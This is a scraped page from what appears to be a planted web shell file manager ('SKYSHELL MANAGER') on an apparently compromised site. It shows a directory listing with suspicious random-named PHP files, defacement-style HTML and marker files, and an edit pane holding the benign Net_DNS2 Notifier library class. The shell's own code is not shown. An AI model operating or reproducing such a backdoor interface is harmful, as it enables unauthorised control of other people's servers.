📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: Notifier.php
<?php /** * DNS Library for handling lookups and updates. * * Copyright (c) 2020, Mike Pultz <mike@mikepultz.com>. All rights reserved. * * See LICENSE for more details. * * @category Networking * @package Net_DNS2 * @author Mike Pultz <mike@mikepultz.com> * @copyright 2020 Mike Pultz <mike@mikepultz.com> * @license http://www.opensource.org/licenses/bsd-license.php BSD License * @link https://netdns2.com/ * @since File available since Release 0.6.0 * */ /** * The main dynamic DNS notifier class. * * This class provices functions to handle DNS notify requests as defined by RFC 1996. * * This is separate from the Net_DNS2_Resolver class, as while the underlying * protocol is the same, the functionality is completely different. * * Generally, query (recursive) lookups are done against caching server, while * notify requests are done against authoratative servers. * */ class Net_DNS2_Notifier extends Net_DNS2 { /* * a Net_DNS2_Packet_Request object used for the notify request */ private $_packet; /** * Constructor - builds a new Net_DNS2_Notifier objected used for doing * DNS notification for a changed zone * * @param string $zone the domain name to use for DNS updates * @param mixed $options an array of config options or null * * @throws Net_DNS2_Exception * @access public * */ public function __construct($zone, array $options = null) { parent::__construct($options); // // create the packet // $this->_packet = new Net_DNS2_Packet_Request( strtolower(trim($zone, " \n\r\t.")), 'SOA', 'IN' ); // // make sure the opcode on the packet is set to NOTIFY // $this->_packet->header->opcode = Net_DNS2_Lookups::OPCODE_NOTIFY; } /** * checks that the given name matches the name for the zone we're notifying * * @param string $name The name to be checked. * * @return boolean * @throws Net_DNS2_Exception * @access private * */ private function _checkName($name) { if (!preg_match('/' . $this->_packet->question[0]->qname . '$/', $name)) { throw new Net_DNS2_Exception( 'name provided (' . $name . ') does not match zone name (' . $this->_packet->question[0]->qname . ')', Net_DNS2_Lookups::E_PACKET_INVALID ); } return true; } /** * 3.7 - Add RR to notify * * @param Net_DNS2_RR $rr the Net_DNS2_RR object to be sent in the notify message * * @return boolean * @throws Net_DNS2_Exception * @access public * */ public function add(Net_DNS2_RR $rr) { $this->_checkName($rr->name); // // add the RR to the "notify" section // if (!in_array($rr, $this->_packet->answer)) { $this->_packet->answer[] = $rr; } return true; } /** * add a signature to the request for authentication * * @param string $keyname the key name to use for the TSIG RR * @param string $signature the key to sign the request. * * @return boolean * @access public * @see Net_DNS2::signTSIG() * @deprecated function deprecated in 1.1.0 * */ public function signature($keyname, $signature, $algorithm = Net_DNS2_RR_TSIG::HMAC_MD5) { return $this->signTSIG($keyname, $signature, $algorithm); } /** * returns the current internal packet object. * * @return Net_DNS2_Packet_Request * @access public # */ public function packet() { // // take a copy // $p = $this->_packet; // // check for an authentication method; either TSIG or SIG // if ( ($this->auth_signature instanceof Net_DNS2_RR_TSIG) || ($this->auth_signature instanceof Net_DNS2_RR_SIG) ) { $p->additional[] = $this->auth_signature; } // // update the counts // $p->header->qdcount = count($p->question); $p->header->ancount = count($p->answer); $p->header->nscount = count($p->authority); $p->header->arcount = count($p->additional); return $p; } /** * executes the notify request * * @param Net_DNS2_Packet_Response &$response ref to the response object * * @return boolean * @throws Net_DNS2_Exception * @access public * */ public function notify(&$response = null) { // // check for an authentication method; either TSIG or SIG // if ( ($this->auth_signature instanceof Net_DNS2_RR_TSIG) || ($this->auth_signature instanceof Net_DNS2_RR_SIG) ) { $this->_packet->additional[] = $this->auth_signature; } // // update the counts // $this->_packet->header->qdcount = count($this->_packet->question); $this->_packet->header->ancount = count($this->_packet->answer); $this->_packet->header->nscount = count($this->_packet->authority); $this->_packet->header->arcount = count($this->_packet->additional); // // make sure we have some data to send // if ($this->_packet->header->qdcount == 0) { throw new Net_DNS2_Exception( 'empty headers- nothing to send!', Net_DNS2_Lookups::E_PACKET_INVALID ); } // // send the packet and get back the response // $response = $this->sendPacket($this->_packet, $this->use_tcp); // // clear the internal packet so if we make another request, we don't have // old data being sent. // $this->_packet->reset(); // // for notifies, we just need to know it worked- we don't actualy need to // return the response object // return true; } }
Save